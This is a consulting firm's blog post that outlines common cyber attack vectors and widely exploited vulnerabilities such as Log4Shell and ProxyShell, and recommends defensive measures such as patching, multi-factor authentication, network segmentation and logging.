Staying Safe in the Current Cyber Threat Landscape
With the current geopolitical headlines, now more than ever is the time to become aware of what cyber threats exist and what mitigations can be put in place. This post serves as a quick, high-level, reference explaining common attack vectors and offering several key steps to take in hardening your organization.
Common Attack Vectors
Email - Attackers leverage phishing e-mails to gain access to user accounts. From there, it is possible to access the corporate network and attempt to increase permissions before stealing data or deploying ransomware.
VPNs - VPNs are a direct foothold into the network. Should unpatched vulnerabilities exist on perimeter devices, an attacker can find themselves on the network upon exploit. Additionally, without multi-factor authentication, a compromised user account may allow authenticated access to the network via a VPN.
Unpatched External Systems - Every day thousands of scans take place across the internet poking at various internet devices and hosted services. Unpatched systems facing the internet can be another easy entryway for an attacker.
Common Exploited Vulnerabilities
Over the lastyear, there have been a few vulnerabilities making headlines due to their prevalence across multiple technologies and the impact they have when exploited. These vulnerabilities are the top ones to watch for and ensure you are patched against as they are actively being exploited. Included below are disclosures by the original authors.
Log4Shell - (CVE-2021-44228) - The zero-day vulnerability in the Log4J Java logging framework allowed for arbitrary code execution. Vulnerable devices can quickly be taken over by an attacker.
ProxyShell - Consisting of three vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) - Proxy shell targets Microsoft Exchange Server. Through the various vulnerabilities, an attacker can execute arbitrary code through an exposed 443 port taking over the sever.
Various VPN Vulnerabilities - PulseVPN and SonicWall have seen vulnerabilities in the last year targeted by ransomware groups and state actors alike. Ensure any publicly facing networking devices are patched.
General Steps to Stay Safe
Identify and ensure externally facing assets have been configured correctly and are adequately patched. Consider decommissioning extraneous externally facing assets.
Employ Multi-Factor Authentication on all assets that support it. Consider placing applications and services that do not support MFA behind a VPN that does support MFA.
Invest in Employee Security Awareness Training. Reduce the risk of the human element by ensuring employees can recognize Business Email Compromise and Phishing Attacks.
Segment networks and isolate critical devices. Flat networks can quickly be taken over should one device become compromised.
Access critical assets, sometimes referred to as ‘Crown Jewels’, should have additional layers of security.
Ensure adequate logging is taking place throughout the organization. Detecting and responding to potentially malicious activity is far more challenging without logging enabled.
Pay Attention to Government Guidelines
Various government organizations such as The Cybersecurity Infrastructure Security Agency (CISA) and the FBI often release information on the current threat landscape and active attack methods. As vulnerabilities are published, ensure corporate assets are patched in a timely manner - especially those that are externally facing.
Additional Resources:
Contact Us
Thoreson Consulting is here to assist any organizations with general questions on the current threat landscape and how to stay secure. The topics in this blog post are high-level and should serve as a starting point for organizations interested in becoming more secure. Please reach out to us if additional guidance is needed.
We are also eager to assist in performing risk assessments, facilitating employee Trainings, or working together to improve your organization’s overall posture.